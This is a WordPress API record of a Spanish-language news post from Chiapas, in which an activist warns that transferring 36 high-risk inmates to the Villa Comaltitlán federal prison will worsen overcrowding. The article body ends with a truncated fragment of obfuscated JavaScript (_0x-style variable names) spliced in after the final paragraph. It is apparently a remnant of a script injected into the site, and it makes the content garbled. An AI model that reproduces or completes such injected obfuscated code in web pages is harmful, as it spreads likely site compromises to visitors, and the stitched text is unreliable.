{"id":7933,"date":"2023-01-09T04:35:18","date_gmt":"2023-01-09T04:35:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7933"},"modified":"2023-01-09T04:35:18","modified_gmt":"2023-01-09T04:35:18","slug":"genera-preocupacion-traslado-de-reos-a-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7933","title":{"rendered":"Genera preocupaci\u00f3n, traslado de reos a Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"640\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0012-1024x640.jpg\" alt=\"\" class=\"wp-image-7934\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0012-1024x640.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0012-300x187.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0012-768x480.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230108-WA0012.jpg 1140w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 8 de enero del 2023. Tuxtla Guti\u00e9rrez.- Alberto Patisht\u00e1n G\u00f3mez, activista chiapaneco dijo que, luego del traslado de 191 reos del penal de Ciudad Ju\u00e1rez, Chihuahua a distintos reclusorios del pa\u00eds, en donde 36 fueron enviados al penal federal de Villa Comaltitl\u00e1n, Chiapas, lo que debe ser un tema de atenci\u00f3n para las autoridades.<\/p>\n\n\n\n<p>\u201cEsto contribuye de manera negativa a la sobre poblaci\u00f3n en este penal que alberga reclusos de alta peligrosidad.<br>Los penales en Chiapas, mantienen sobre cupo que ocasiona enfrentamientos entre los reos, incluso motines, y es que se encuentran hacinados y hay casos de reclusos que duermen en pasillos o abajo de las literas por falta de espacios\u201d, expuso.<\/p>\n\n\n\n<p>En d\u00edas pasados, la Secretar\u00eda de la Defensa Nacional, confirm\u00f3 el traslado de 191 reos, de alta peligrosidad, del Centro de Reinserci\u00f3n Social Estatal N\u00famero 3 de Ciudad Ju\u00e1rez, Chihuahuha, a cinco penales federales y se realiz\u00f3 a trav\u00e9s de dos rutas a\u00e9reas \u201csin novedad y con \u00e9xito\u201d.<br>El activista Patisht\u00e1n G\u00f3mez, sostiene que, aunque se trata de un penal federal, la poblaci\u00f3n en ocasiones -presuntamente- entrega fuertes sumas de dinero para alcanzar un espacio para colocar sus pertenencias personales y una cama, a trav\u00e9s de estos &#8220;m\u00e9ritos&#8221;, reciben un lugar para dormir.<\/p>\n\n\n\n<p>Precis\u00f3 que: \u201cMayormente las c\u00e1rceles est\u00e1n sobre pobladas, o los que todav\u00eda no est\u00e1n sentenciados a esos se los llevan a prisiones federales, varias personas alcanzamos a ver eso\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 8 de enero del 2023. Tuxtla Guti\u00e9rrez.- Alberto Patisht\u00e1n G\u00f3mez, activista chiapaneco dijo que, luego del traslado de 191 reos del penal de Ciudad Ju\u00e1rez, Chihuahua a distintos reclusorios del pa\u00eds, en donde 36 fueron enviados al penal federal de Villa Comaltitl\u00e1n, Chiapas, lo que debe ser un tema de atenci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7934,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7933","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7933","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7933"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7933\/revisions"}],"predecessor-version":[{"id":7935,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7933\/revisions\/7935"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7934"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7933"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7933"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7933"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}